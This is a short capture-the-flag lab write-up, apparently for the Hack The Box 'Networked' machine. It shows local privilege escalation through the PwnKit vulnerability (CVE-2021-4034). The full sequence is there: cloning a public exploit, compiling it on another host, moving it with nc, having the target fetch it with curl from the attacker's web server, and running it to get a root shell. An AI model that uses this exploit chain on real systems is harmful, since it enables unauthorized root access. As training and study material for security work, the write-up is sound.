InfoSec LAB

Networked_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

PEAS found that the target system is vulnerable to CVE-2021-4034 a vulnerability, which was classified as critical, has been found in polkit (unknown version). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

exploit (pwnkit)

Exploit is available online

bash-4.2$ gcc
bash: gcc: command not found

The target system does not have a compiler installed. The exploit would need to be compiled remotely.

I would normally use a docker container for that, but I got my personal CentOS 7 testing environment ready.

Remote Compilation

[cent@localhost desktop]$ git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.

I got the exploit

[cent@localhost CVE-2021-4034]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compiling done

[cent@localhost CVE-2021-4034]$ cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

I then archived the exploit package for delivery

[cent@localhost Desktop]$ nc 10.1.1.2 2222 < CVE-2021-4034.tar.gz 
 
┌──(kali㉿kali)-[~/…/htb/labs/networked/kernelbuster]
└─$ nnc 2222 > CVE-2021-4034.tar.gz 
listening on [any] 2222 ...
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.30] 46928
 
bash-4.2$ curl -s http://10.10.14.11:8000/CVE-2021-4034.tar.gz -o ./CVE-2021-4034.tar.gz

Delivery complete

Exploitation

bash-4.2$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
bash-4.2$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# hostname
networked.htb
sh-4.2# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks